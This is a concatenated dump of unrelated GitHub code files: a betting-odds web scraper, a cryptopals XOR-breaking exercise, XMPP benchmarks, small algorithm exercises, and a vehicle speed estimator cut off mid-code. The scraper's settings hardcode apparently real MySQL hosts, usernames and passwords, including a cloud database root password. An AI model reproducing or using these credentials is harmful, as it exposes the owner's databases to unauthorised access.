TimeStamp\n Start time\n curr_time : Time\n The current time\n\n Returns\n ----------\n None\n\n \"\"\"\n hour_of_day = start_time.get_hour_of_day(curr_time)\n p, q = self.get_system_load_balance()\n for ev_park in self.ev_parks:\n p, q = ev_park.update(\n p=p,\n q=q,\n fail_duration=fail_duration,\n dt=dt,\n hour_of_day=hour_of_day,\n )\n\n def reset_load_flow_data(self):\n \"\"\"\n Reset the variables used in the load flow analysis\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n None\n\n \"\"\"\n for bus in self.buses:\n bus.reset_load_flow_data()\n for line in self.lines:\n line.reset_load_flow_data()\n","repo_name":"stinefm/relsad","sub_path":"relsad/network/systems/SubSystem.py","file_name":"SubSystem.py","file_ext":"py","file_size_in_byte":9272,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"18719126756","text":"import scrapy\nimport json\nimport arrow\nimport time\nfrom scrapy.selector import Selector\nfrom ..items import MatchItem\nfrom ..items import OuOddsItem\nfrom ..items import YaOddsItem\nfrom ..items import DxOddsItem\nfrom ..comm import funs\nfrom ..comm.MsDebug import MsLog\nfrom ..comm.OpData import OpData\n\n\nclass MasterSpider(scrapy.Spider):\n name = \"MasterSpider\"\n\n custom_settings = {\n\t\t'MYSQL_HOST': '192.168.1.19',\n 'MYSQL_USER': 'isoying',\n 'MYSQL_PASSWORD': 'isoying123',\n 'MYSQL_PORT': 3306,\n 'MYSQL_DB': 'zcdata',\n 'DOWNLOAD_DELAY': 0.35,\n 'ITEM_PIPELINES': {\n 'MsSpider.pipelines.pipelines.MsspiderPipeline': 300\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'MsSpider.middlewares.MsAgentMiddleware': 100,\n 'MsSpider.middlewares.MsHttpProxyMiddleware': 110,\n }\n }\n\n def __init__(self, params=None, *args, **kwargs):\n super(MasterSpider, self).__init__(*args, **kwargs)\n self.params = json.loads(params)\n # self.custom_settings['DOWNLOAD_DELAY'] = self.params['delay']\n\n def closed(self, reason):\n MsLog.debug('爬虫[MasterSpider]结束[{0}]-[{1}], Reason[{2}]'.format(self.params['sDate'], self.params['eDate'], reason))\n\n def start_requests(self):\n try:\n sDate = arrow.get(self.params['sDate'])\n eDate = arrow.get(self.params['eDate'])\n today = arrow.get(arrow.Arrow.now().format('YYYY-MM-DD'))\n MsLog.debug('[启动爬虫[MasterSpider]时间段[{0}]-[{1}]'.format(self.params['sDate'], self.params['eDate']))\n url = 'http://live.500.com/wanchang.php?e={0}'\n for day in arrow.Arrow.range('day', sDate, eDate.shift(days=-1)):\n if day >= today:\n print('时间超出范围{}'.format(day))\n break\n ssDate = day.format('YYYY-MM-DD')\n yield scrapy.Request(url=url.format(ssDate), callback=self.parseHistory, meta={'year': ssDate[:4]})\n except Exception as e:\n print('start_requests err:{0}'.format(e))\n\n def parseHistory(self, response):\n if response.status != 200:\n return\n datas = Selector(response).xpath('//tr[@gy and @yy]').extract()\n for data in datas:\n try:\n st = Selector(text=data)\n if not st:\n continue\n\n status = st.xpath('//span[@class=\"red\"]/text()').extract()[0]\n if not status:\n continue\n\n if status != '完':\n continue\n\n item = MatchItem()\n item['mid'] = st.xpath('//tr/@id').extract()[0][1:]\n item['lname'] = st.xpath('//td[@class=\"ssbox_01\"]/a/text()').extract()[0].replace(' ', '').replace(' ', '')\n item['mtname'] = st.xpath('//td[@class=\"p_lr01\" and @align=\"right\"]/a/span/text()').extract()[0].replace(' ', '')\n item['mtfname'] = ''\n item['dtname'] = st.xpath('//td[@class=\"p_lr01\" and @align=\"left\"]/a/span/text()').extract()[0].replace(' ', '')\n item['dtfname'] = ''\n\n # 提取比赛得分\n tmpNode = st.xpath('//div[@class=\"pk\"]/a/text()').extract()\n if len(tmpNode) >= 3:\n item['jq'] = funs.s2i(tmpNode[0]) # 进球数\n item['sq'] = funs.s2i(tmpNode[2]) # 失球数\n else:\n item['jq'] = 0\n item['sq'] = 0\n\n # 计算比赛时间\n tmpDate = st.xpath('//td[@align=\"center\"]/text()').extract()[1]\n if tmpDate:\n item['mdate'] = '{0}-{1}:00'.format(response.meta['year'], tmpDate)\n yield item\n except Exception as e:\n print('parseHistory err: {0}'.format(e))\n\n\nclass DatailSpider(scrapy.Spider):\n\n name = \"DatailSpider\"\n\n custom_settings = {\n # 'MYSQL_HOST': 'rm-m5eyk861d8408u3ix.mysql.rds.aliyuncs.com',\n 'MYSQL_HOST': 'rm-m5eyk861d8408u3ix1o.mysql.rds.aliyuncs.com',\n 'MYSQL_USER': 'root',\n 'MYSQL_PASSWORD': 'Tingxue_147258369',\n 'MYSQL_PORT': 3306,\n 'MYSQL_DB': 'zcdata',\n 'DOWNLOAD_DELAY': 0.35,\n 'ITEM_PIPELINES': {\n 'MsSpider.pipelines.pipelines.MsspiderPipeline': 300\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'MsSpider.middlewares.MsAgentMiddleware': 100,\n 'MsSpider.middlewares.MsHttpProxyMiddleware': 110,\n }\n }\n\n def __init__(self, params=None, *args, **kwargs):\n super(DatailSpider, self).__init__(*args, **kwargs)\n self.params = json.loads(params)\n opdata = OpData(host=self.custom_settings['MYSQL_HOST'],\n user=self.custom_settings['MYSQL_USER'],\n pwd=self.custom_settings['MYSQL_PASSWORD'],\n database=self.custom_settings['MYSQL_DB'])\n # 这个SQL, 重新跑明细\n # sql = '''\n # select mid, mdate, 0 as ou, 0 as ya, 0 as dx\n # from matchdata\n # where oumid is null and a.mdate >= '{}' and a.mdate <= '{}'\n # '''.format(self.params['sDate'], self.params['eDate'])\n\n # 这个SQL,只抓取没有明细的比赛\n sql = '''\n select mid, mdate,\n case when oumid is null then 0 else 1 end as ou,\n case when yamid is null then 0 else 1 end as ya,\n case when dxmid is null then 0 else 1 end as dx\n from matchdata as a left join\n (\n select distinct mid as oumid from ouodds\n ) as b on a.mid = b.oumid left join\n (\n select distinct mid as yamid from yaodds\n ) as c on a.mid = c.yamid left join\n (\n select distinct mid as dxmid from dxodds\n ) as d on a.mid = d.dxmid\n where oumid is null and a.mdate >= '{}' and a.mdate <= '{}'\n '''.format(self.params['sDate'], self.params['eDate'])\n self.matchs = opdata.query(sql)\n\n def closed(self, reason):\n MsLog.debug('爬虫[DetailSpider]结束[{0}]-[{1}], Reason[{2}]'.format(self.params['sDate'], self.params['eDate'], reason))\n\n def start_requests(self):\n try:\n MsLog.debug('[启动爬虫[DatailSpider]')\n for data in self.matchs:\n MsLog.debug('mid:{} mdate:{} ou:{} ya:{} dx:{}'.format(data['mid'], data['mdate'], data['ou'], data['ya'], data['dx']))\n myear = arrow.get(data['mdate']).format('YYYY')\n if data['ou'] == 0:\n # 欧赔页面url\n url = 'http://odds.500.com/fenxi/ouzhi-{0}.shtml'.format(data['mid'])\n yield scrapy.Request(url=url, callback=self.parseOuOddsPages, meta={'mid': data['mid']})\n\n if data['ya'] == 0:\n # 亚赔页面url\n url = 'http://odds.500.com/fenxi/yazhi-{0}.shtml'.format(data['mid'])\n yield scrapy.Request(url=url, callback=self.parseYaOddsPages, meta={'year': myear, 'mid': data['mid']})\n\n if data['dx'] == 0:\n # 大小指数url\n url = 'http://odds.500.com/fenxi/daxiao-{0}.shtml'.format(data['mid'])\n yield scrapy.Request(url=url, callback=self.parseDxOddsPages, meta={'year': myear, 'mid': data['mid']})\n except Exception as e:\n print('start_requests err:{0}'.format(e))\n\n def parseOuOddsPages(self, response):\n mid = response.meta['mid']\n try:\n tmpNode = Selector(response=response).xpath('//div[@class=\"table_btm\"]//span[@id=\"nowcnum\"]/text()').extract()\n lyCount = funs.s2i(tmpNode[0])\n pageCount = lyCount // 30 + (1 if lyCount % 30 > 0 else 0)\n\n for i in range(pageCount):\n url = 'http://odds.500.com/fenxi1/ouzhi.php?id={0}&ctype=1&start={1}&r=1&style=0&guojia=0&chupan=1'.format(mid, i * 30)\n yield scrapy.Request(url=url, callback=self.parseOuOdds, meta={'mid': mid})\n\n except Exception as e:\n self.logger.error('[Parse Error][{0}][{1}]'.format(mid, e))\n\n def parseOuOdds(self, response):\n mid = response.meta['mid']\n datas = Selector(response).xpath('//tr[@ttl=\"zy\"]').extract()\n for data in datas:\n try:\n # 提取博彩公司名称\n st = Selector(text=data)\n bname = st.xpath('//td[@class=\"tb_plgs\"]/@title').extract()[0].replace(' ', '')\n\n cid = st.xpath('//tr/@id').extract()[0]\n ctime = st.xpath('//tr/@data-time').extract()[0]\n # 解析明细数据\n stimpstamp = int(arrow.now().float_timestamp * 1000)\n url = 'http://odds.500.com/fenxi1/json/ouzhi.php?_={0}&fid={1}&cid={2}&r=1&time={3}&type=europe'.format(stimpstamp, mid, cid, ctime)\n yield scrapy.Request(url=url, callback=self.parseImmOuOdds, meta={'mid': mid, 'bname': bname})\n except:\n pass\n\n def parseImmOuOdds(self, response):\n mid = response.meta['mid']\n bname = response.meta['bname']\n datas = json.loads(response.body)\n for data in datas:\n try:\n item = OuOddsItem()\n item['mid'] = mid\n item['bname'] = bname\n item['owin'] = funs.s2f(data[0])\n item['odraw'] = funs.s2f(data[1])\n item['olose'] = funs.s2f(data[2])\n item['retratio'] = funs.s2f(data[3])\n item['kwin'] = 0.0\n item['kdraw'] = 0.0\n item['klose'] = 0.0\n item['cdate'] = data[4]\n yield item\n except Exception as e:\n print('[parseOuOdds Error][{0}][{1}]'.format(mid, e))\n\n def parseYaOddsPages(self, response):\n mid = response.meta['mid']\n try:\n tmpNode = Selector(response=response).xpath('//div[@class=\"table_btm\"]//span[@id=\"nowcnum\"]/text()').extract()\n lyCount = funs.s2i(tmpNode[0])\n pageCount = lyCount // 30 + (1 if lyCount % 30 > 0 else 0)\n\n for i in range(pageCount):\n url = 'http://odds.500.com/fenxi1/yazhi.php?id={0}&ctype=1&start={1}&r=1&style=0&guojia=0'.format(mid, i * 30)\n yield scrapy.Request(url=url, callback=self.parseYaOdds, meta={'year': response.meta['year'], 'mid': mid})\n except Exception as e:\n self.logger.error('[Parse Error][{0}][{1}]'.format(mid, e))\n\n def parseYaOdds(self, response):\n mid = response.meta['mid']\n datas = Selector(response).xpath('//tr[@xls=\"row\"]').extract()\n for data in datas:\n try:\n st = Selector(text=data)\n # 提取博彩公司名称\n bname = st.xpath('//span[@class=\"quancheng\"]/text()').extract()[0]\n mmyid = st.xpath('//tr/@id').extract()[0]\n # 解析明细数据\n sTimpstamp = int(arrow.now().float_timestamp * 1000)\n url = 'http://odds.500.com/fenxi1/inc/yazhiajax.php?fid={0}&id={1}&t={2}&r=1'.format(mid, mmyid, sTimpstamp)\n yield scrapy.Request(url=url, callback=self.parseImmYaOdds, headers={'X-Requested-With': 'XMLHttpRequest'}, meta={'year': response.meta['year'], 'mid': mid, 'bname': bname})\n except Exception as e:\n print(e)\n\n def parseImmYaOdds(self, response):\n mid = response.meta['mid']\n bname = response.meta['bname']\n try:\n datas = json.loads(response.body)\n for data in datas:\n item = YaOddsItem()\n data = data.replace(' ', '')\n data = Selector(text=data).xpath('//td/text()').extract()\n item['mid'] = mid\n item['bname'] = bname\n item['odds1'] = funs.s2f(data[0])\n item['disc'] = data[1]\n item['odds2'] = funs.s2f(data[2])\n item['cdate'] = '{0}-{1}:00'.format(response.meta['year'], data[3])\n yield item\n except Exception as e:\n self.log('[parseImmYaOdds Error][{0}][{1}]'.format(mid, e))\n\n def parseDxOddsPages(self, response):\n mid = response.meta['mid']\n try:\n tmpNode = Selector(response=response).xpath('//div[@class=\"table_btm\"]//span[@id=\"nowcnum\"]/text()').extract()\n lyCount = funs.s2i(tmpNode[0])\n pageCount = lyCount // 30 + (1 if lyCount % 30 > 0 else 0)\n\n for i in range(pageCount):\n url = 'http://odds.500.com/fenxi1/daxiao.php?id={0}&ctype=1&start={1}&r=1&style=0&guojia=0'.format(mid, i * 30)\n yield scrapy.Request(url=url, callback=self.parseDxOdds, meta={'year': response.meta['year'], 'mid': mid})\n except Exception as e:\n self.logger.error('[Parse Error][{0}][{1}]'.format(mid, e))\n\n def parseDxOdds(self, response):\n mid = response.meta['mid']\n datas = Selector(response).xpath('//tr[@xls=\"row\"]').extract()\n for data in datas:\n try:\n st = Selector(text=data)\n\n # 提取博彩公司名称\n bname = st.xpath('//span[@class=\"quancheng\"]/text()').extract()[0]\n\n mmyid = st.xpath('//tr/@id').extract()[0]\n\n # 解析明细数据\n sTimpstamp = int(arrow.now().float_timestamp * 1000)\n url = 'http://odds.500.com/fenxi1/inc/daxiaoajax.php?fid={0}&id={1}&t={2}'.format(mid, mmyid, sTimpstamp)\n yield scrapy.Request(url=url, callback=self.parseImmDxOdds, headers={'X-Requested-With': 'XMLHttpRequest'}, meta={'year': response.meta['year'], 'mid': mid, 'bname': bname})\n except Exception as e:\n self.log('[parseDxOdds Error][{0}][{1}]'.format(mid, e))\n\n def parseImmDxOdds(self, response):\n mid = response.meta['mid']\n bname = response.meta['bname']\n try:\n datas = json.loads(response.body)\n for data in datas:\n item = DxOddsItem()\n data = data.replace(' ', '')\n data = Selector(text=data).xpath('//td/text()').extract()\n item['mid'] = mid\n item['bname'] = bname\n item['odds1'] = funs.s2f(data[0])\n item['disc'] = data[1]\n item['odds2'] = funs.s2f(data[2])\n item['cdate'] = '{0}-{1}:00'.format(response.meta['year'], data[3])\n yield item\n except Exception as e:\n self.log('[parseImmDxOdds Error][{0}][{1}]'.format(mid, e))","repo_name":"mansoy/MsSpider","sub_path":"MsSpider/spiders/FixedSpider.py","file_name":"FixedSpider.py","file_ext":"py","file_size_in_byte":14913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27922950997","text":"import os\nimport random\n\nos.chdir(\"/home/wangzhaokang/wangyunpan/gnns-project/ogb_evaluations/exp\")\nfor data in ['mag', 'products']:\n for sampler in ['neighborsampling', 'cluster', 'graphsaint']:\n for alg in ['gcn', 'sage', 'gat', 'rgcn']:\n file_path = f\"{data}/{sampler}_{alg}.py\"\n if not os.path.exists(file_path):\n continue\n print(file_path)\n cmd = f\"python -u {file_path} --device {random.randint(0,1)} 1>log/{data}_{sampler}_{alg}.out 2>&1\"\n os.system(cmd)\n\n","repo_name":"AugF/ogb-evaluations","sub_path":"exp/log/run_baselines.py","file_name":"run_baselines.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17872096776","text":"from set1 import *\n\nwith open(\"6.txt\",\"r\") as f:\n\tdata = f.readlines()\ns = \"\".join(data).replace(\"\\n\",\"\")\ns = b64_to_hex(s)\n\n # contains keysize guess and avg hamming distance between two blocks\nhams = {}\n\n# keysizes need to be in multiples of two since we are reading hex\nfor size in range(4,82,2):\n\tnum_slices = len(s)//size\n\tscore = 0\n\titerations = 0\n\tfor i in range(num_slices-1):\n\t\tblock_1 = s[i*size:i*size+size]\n\t\tblock_2 = s[i*size+size:i*size+size*2]\n\t\t#print(f\"{block_1}, {block_2}, {ham_dist(block_1,block_2,'hex')/size}\")\n\t\tscore += ham_dist(block_1,block_2,\"hex\")/size\n\t\titerations += 1\n\thams[size//2] = score/iterations\n\n# keysizes sorted by shortest average hamming distance between two blocks\nsorted_hams = sorted(hams.items(), key=lambda x:(x[1],x[0]))\n# print(sorted_hams)\n\n# item[0] is keysize, item[1] is hamming dist\nfor item in sorted_hams[:3]:\n\ttest_blocks = data_to_blocks(s, int(item[0]))\n\t#print(test_blocks)\n\t\n\ttransposed_blocks = transpose_blocks(test_blocks)\n\t#print(transposed_blocks)\n\t\n\tprint(f\"Finding candidate key for keysize: {item[0]}\")\n\tkey = \"\"\n\tfor block in transposed_blocks:\n\t\tblock_len = len(block)\n\t\tkey+=find_xor_chr(block)[1]\n\n\tpkey = bytes.fromhex(key).decode(\"utf-8\")\n\tptext = bytes.fromhex(repeating_key_xor(s, key, \"hex\")).decode(\"utf-8\")\n\n\tprint(f\"key: {pkey}\\nplaintext: {ptext}\")\n\t\t\n\n","repo_name":"cckev/cryptopals","sub_path":"py/set1/challenge6.py","file_name":"challenge6.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32684347746","text":"########################################################################\n# File name: test_xml.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\nimport base64\nimport io\nimport itertools\nimport unittest\nimport random\n\nimport aioxmpp.xso as xso\nimport aioxmpp.xml\n\nfrom aioxmpp.benchtest import times, timed, record\n\n\nclass ShallowRoot(xso.XSO):\n TAG = (\"uri:test\", \"shallow\")\n\n attr = xso.Attr(\"a\")\n data = xso.Text()\n\n def __init__(self, scale=1):\n super().__init__()\n self.attr = \"foobar\"*(2*scale)\n self.data = \"fnord\"*(10*scale)\n\n\nclass DeepLeaf(xso.XSO):\n TAG = (\"uri:test\", \"leaf\")\n\n data = xso.Text()\n\n def generate(self, rng, depth):\n self.data = \"foo\" * (2*rng.randint(1, 10))\n\n\nclass DeepNode(xso.XSO):\n TAG = (\"uri:test\", \"node\")\n\n data = xso.Attr(\"attr\")\n children = xso.ChildList([DeepLeaf])\n\n def generate(self, rng, depth):\n self.data = \"foo\" * (2*rng.randint(1, 10))\n if depth >= 5:\n cls = DeepLeaf\n else:\n cls = DeepNode\n\n self.children.append(cls())\n for i in range(rng.randint(2, 10)):\n if rng.randint(1, 10) == 1:\n item = DeepNode()\n else:\n item = DeepLeaf()\n self.children.append(item)\n\n for item in self.children:\n item.generate(rng, depth+1)\n\n\nDeepNode.register_child(DeepNode.children, DeepNode)\n\n\nclass DeepRoot(xso.XSO):\n TAG = (\"uri:test\", \"root\")\n\n children = xso.ChildList([DeepLeaf, DeepNode])\n\n def generate(self, rng):\n self.children[:] = [DeepNode() for i in range(3)]\n for child in self.children:\n child.generate(rng, 1)\n\n\nclass TestxmlValidateNameValue_str(unittest.TestCase):\n KEY = \"aioxmpp.xml\", \"xmlValidateNameValue\"\n\n def test_exhaustive(self):\n validate = aioxmpp.xml.xmlValidateNameValue_str\n\n r1 = range(0, 0xd800)\n r2 = range(0xe000, 0xf0000)\n\n range_iter = itertools.chain(\n # exclude surrogates\n r1, r2,\n )\n\n with timed() as timer:\n for cp in range_iter:\n validate(chr(cp))\n\n record(self.KEY + (\"exhaustive\",),\n timer.elapsed / (len(r1) + len(r2)),\n \"s\")\n\n def test_exhaustive_dualchar(self):\n validate = aioxmpp.xml.xmlValidateNameValue_str\n\n strs = [\"x\" + chr(cp) for cp in range(0, 0xd800)]\n\n with timed() as timer:\n for s in strs:\n validate(s)\n\n record(self.KEY + (\"exhaustive_dualchar\",),\n timer.elapsed / (len(strs)),\n \"s\")\n\n def test_random_strings(self):\n key = self.KEY + (\"random\",)\n\n validate = aioxmpp.xml.xmlValidateNameValue_str\n\n rng = random.Random(1)\n samples = []\n for i in range(1000):\n samples.append(base64.b64encode(\n random.getrandbits(120).to_bytes(120//8, 'little')\n ).decode(\"ascii\").rstrip(\"=\"))\n\n for sample in samples:\n with timed() as timer:\n validate(sample)\n record(key, timer.elapsed, \"s\")\n\n\nclass Testwrite_single_xso(unittest.TestCase):\n KEY = \"aioxmpp.xml\", \"write_single_xso\"\n\n @classmethod\n def setUpClass(cls):\n rng = random.Random(1)\n cls.deep_samples = [\n DeepRoot()\n for i in range(10)\n ]\n for sample in cls.deep_samples:\n with timed(cls.KEY+(\"deep\", \"generate\")):\n sample.generate(rng)\n\n def setUp(self):\n self.buf = io.BytesIO(bytearray(1024*1024))\n\n def _reset_buffer(self):\n self.buf.seek(0)\n\n @times(1000)\n def test_shallow_and_small(self):\n key = self.KEY + (\"shallow+small\",)\n item = ShallowRoot()\n self._reset_buffer()\n with timed() as t:\n aioxmpp.xml.write_single_xso(item, self.buf)\n record(key+(\"sz\",), self.buf.tell(), \"B\")\n record(key+(\"rate\",), self.buf.tell() / t.elapsed, \"B/s\")\n\n @times(1000)\n def test_shallow_and_large(self):\n key = self.KEY + (\"shallow+large\",)\n item = ShallowRoot(scale=100)\n self._reset_buffer()\n with timed() as t:\n aioxmpp.xml.write_single_xso(item, self.buf)\n record(key+(\"sz\",), self.buf.tell(), \"B\")\n record(key+(\"rate\",), self.buf.tell() / t.elapsed, \"B/s\")\n\n @times(1000, pass_iteration=True)\n def test_deep(self, iteration=None):\n key = self.KEY + (\"deep\",)\n item = self.deep_samples[iteration % len(self.deep_samples)]\n self._reset_buffer()\n with timed() as t:\n aioxmpp.xml.write_single_xso(item, self.buf)\n record(key+(\"sz\",), self.buf.tell(), \"B\")\n record(key+(\"rate\",), self.buf.tell() / t.elapsed, \"B/s\")\n","repo_name":"horazont/aioxmpp","sub_path":"benchmarks/test_xml.py","file_name":"test_xml.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"11047448502","text":"class PriorityQueue:\n def __init__(self):\n self.heap = []\n\n def parent_index(self, i):\n return (i - 1) // 2\n\n def left_child_index(self, i):\n return 2 * i + 1\n\n def right_child_index(self, i):\n return 2 * i + 2\n\n def enqueue(self, value, priority):\n self.heap.append({'value': value, 'priority': priority})\n i = len(self.heap) - 1\n while i > 0:\n parent_index = self.parent_index(i)\n if self.heap[i]['priority'] < self.heap[parent_index]['priority']:\n self.heap[i], self.heap[parent_index] = self.heap[parent_index], self.heap[i]\n i = parent_index\n else:\n return\n\n def dequeue(self):\n if len(self.heap) == 0:\n return None\n elif len(self.heap) == 1:\n return self.heap.pop()['value']\n else:\n min_val = self.heap[0]['value']\n self.heap[0] = self.heap.pop()\n i = 0\n self.shift_down(i, len(self.heap))\n return min_val\n\n def shift_down(self, i, n):\n smallest = i\n left = self.left_child_index(i)\n right = self.right_child_index(i)\n\n if left < n and self.heap[left]['priority'] < self.heap[smallest]['priority']:\n smallest = left\n\n if right < n and self.heap[right]['priority'] < self.heap[smallest]['priority']:\n smallest = right\n\n if smallest != i:\n self.heap[i], self.heap[smallest] = self.heap[smallest], self.heap[i]\n self.shift_down(smallest, n)\n\n def change_priority(self, heap, value, new_priority):\n for item in heap:\n if item['value'] == value:\n item['priority'] = new_priority\n heap.sort(key=lambda x: x['priority'])\n\n def level_order(self, heap):\n q = [0]\n list_str = ''\n while q:\n curr = q.pop(0)\n list_str += f\"{heap[curr]['value']}\\n\"\n left = self.left_child_index(curr)\n right = self.right_child_index(curr)\n\n if left < len(heap):\n q.append(left)\n\n if right < len(heap):\n q.append(right)\n\n print(list_str)\n\n def get_min(self):\n return self.heap[0]['value']\n\n\npq = PriorityQueue()\n\n# Priority Insertion\npq.enqueue(\"Task 1\", 2)\npq.enqueue(\"Task 2\", 1)\npq.enqueue(\"Task 3\", 2)\npq.enqueue(\"Task 4\", 1)\n\n# Priority Deletion\n# print(pq.dequeue()) # Task 2\n# print(pq.dequeue()) # Task 4\n# print(pq.dequeue()) # Task 1\n# print(pq.dequeue()) # Task 3\n\n# pq.level_order(pq.heap)\nprint(pq.get_min()) # Task 2\n\n# Change Priority Of heap\npq.change_priority(pq.heap, \"Task 3\", 4)\npq.change_priority(pq.heap, \"Task 2\", 1)\npq.change_priority(pq.heap, \"Task 1\", 2)\npq.change_priority(pq.heap, \"Task 4\", 3)\n\nprint(pq.heap) # [{'value': 'Task 2', 'priority': 1}, {'value': 'Task 1', 'priority': 2}, {'value\n","repo_name":"subashkj005/Data_Structure","sub_path":"Week 3/Heap/Priority Queue.py","file_name":"Priority Queue.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28178100012","text":"\"\"\"\r\n\r\n时间复杂度O(N),按书中所讲,3个素数因子3、5、7分为三个队列\r\nq3,q5,q7,其中最初存放3,5,7\r\n * 之后每次添加找到三个队列头中最小的数,起初为3,将3移出队列\r\nq3后,在q3添加3*3,在q5添加3*5,q7中添加3*7\r\n * 此时可知q3{3*3},q5{5,3*5},q7{7,3*7}\r\n * 下一轮找到最小数为5,重复上述步骤,将5从q5移出,添加5*5到\r\nq5,因为5*3已经添加过所以不需要添加到q3中\r\n * 将5*7添加到q7,结果q3{3*3},q5{3*5,5*5},q7{7,3*7,5*7}\r\n * 依次找到第k个数\r\n\"\"\"\r\n\r\nclass KthNumber:\r\n def findKth(self, k):\r\n\r\n queue3 = [3]\r\n queue5 = [5]\r\n queue7 = [7]\r\n count = 0\r\n\r\n while count < k:\r\n min_s = min(queue3[0], queue5[0], queue7[0])\r\n if min_s == queue3[0]:\r\n min_s = queue3.pop(0)\r\n queue3.append(min_s*3)\r\n queue5.append(min_s*5)\r\n elif min_s == queue5[0]:\r\n min_s = queue5.pop(0)\r\n queue5.append(min_s*5)\r\n else:\r\n min_s == queue7[0]\r\n min_s = queue7.pop(0)\r\n queue7.append(min_s*7)\r\n count += 1\r\n return min_s\r\n","repo_name":"jasonusaco/Leetcode-Practice","sub_path":"Math&Puzzles/7.7.py","file_name":"7.7.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25733629843","text":"'''\nYou need to return a string that displays a diamond shape on the screen using asterisk (\"*\")\ncharacters. Please see provided test cases for exact output format.\n\nThe shape that will be returned from print method resembles a diamond, where the number\nprovided as input represents the number of *’s printed on the middle line. The line above\nand below will be centered and will have 2 less *’s than the middle line. This reduction by\n2 *’s for each line continues until a line with a single * is printed at the top and bottom\nof the figure.\n\n\nReturn null if input is even number or negative (as it is not possible to print diamond\nwith even number or negative number).\n\nPlease see provided test case(s) for examples.\nPython Note\n\nSince print is a reserved word in Python, Python students must implement the diamond(n)\nmethod instead, and return None for invalid input.\nJS Note\n\nJS students, like Python ones, must implement the diamond(n) method, and return null for\ninvalid input.\n\nexpected = \" *\\n\"\nexpected += \"***\\n\"\nexpected += \" *\\n\"\ntest.assert_equals(diamond(3), expected)\n\n\n\n\ndef diamond(n):\n\n if n % 2 == 0 or n < 0:\n return None\n else:\n\n ln = 1\n lev = int( n / 2)\n mid = lev + 1\n for i in range(0, (lev * 2) + 1):\n\n if ln == lev + 1:\n for j in range(0,n):\n print(\"*\",end='')\n print(\"\")\n ln += 1\n\n elif ln == 1 or ln == (lev * 2) + 1:\n for j in range(0, lev):\n print(\" \", end='')\n print(\"*\")\n ln += 1\n\n else:\n\n diff = abs(mid - ln)\n\n\n for j in range(0,diff):\n print(\" \", end='')\n\n for j in range(0, n - (diff*2)):\n print(\"*\", end='')\n\n print(\"\")\n ln += 1\n\n'''\n\n\ndef diamond(n):\n out = ''\n\n # Invalid inputs\n if n % 2 == 0 or n < 0:\n return None\n\n # Valid input\n else:\n ln = 1\n mid = int(n / 2) + 1\n\n for i in range(0, n):\n\n # Case 1: Center row\n if ln == mid:\n\n for j in range(0, n):\n print(\"*\", end='')\n out += '*'\n\n print(\"\")\n out += '\\n'\n ln += 1\n\n # Case 2: Top/Bottom row\n elif ln == 1 or ln == n + 1:\n\n for j in range(0, int(n / 2)):\n print(\" \", end='')\n out += ' '\n\n print(\"*\")\n out += '*\\n'\n ln += 1\n\n # Case 3: Other rows\n else:\n\n diff = abs(mid - ln)\n\n for j in range(0, diff):\n print(\" \", end='')\n out += ' '\n\n for j in range(0, n - (diff * 2)):\n print(\"*\", end='')\n out += '*'\n\n print(\"\")\n out += '\\n'\n ln += 1\n\n return out\n\ndef main():\n print(diamond(9))\n\nif __name__ == '__main__': main()","repo_name":"farhanr8/PyExercises","sub_path":"Codewars/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3524013466","text":"from flask import Flask, render_template, Response\n# from camera1 import Video\nimport cv2\nimport math\nimport time\nimport dlib\n\napp=Flask(__name__)\ncarCascade = cv2.CascadeClassifier('vech.xml')\nWIDTH = 1280\nHEIGHT = 720\ndef estimateSpeed(location1, location2):\n d_pixels = math.sqrt(math.pow(location2[0] - location1[0], 2) + math.pow(location2[1] - location1[1], 2))\n # ppm = location2[2] / carWidht\n ppm = 8.8\n d_meters = d_pixels / ppm\n fps = 18\n speed = d_meters * fps * 3.6\n return speed\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\ndef gen():\n video=cv2.VideoCapture(0)\n rectangleColor = (0, 255, 0)\n frameCounter = 0\n currentCarID = 0\n fps = 0\n\n carTracker = {}\n carNumbers = {}\n carLocation1 = {}\n carLocation2 = {}\n speed = [None] * 1000\n while (video.isOpened()):\n start_time= time.time()\n rc, frame= video.read()\n if type(frame)==type(None):\n break\n image=cv2.resize(frame, (WIDTH, HEIGHT))\n frameCounter = frameCounter + 1\n carIDtoDelete = []\n for carID in carTracker.keys():\n trackingQuality = carTracker[carID].update(image)\n\n if trackingQuality < 7:\n carIDtoDelete.append(carID)\n for carID in carIDtoDelete:\n print(\"Removing carID \" + str(carID) + ' from list of trackers. ')\n print(\"Removing carID \" + str(carID) + ' previous location. ')\n print(\"Removing carID \" + str(carID) + ' current location. ')\n carTracker.pop(carID, None)\n carLocation1.pop(carID, None)\n carLocation2.pop(carID, None)\n if not (frameCounter % 10):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cars = 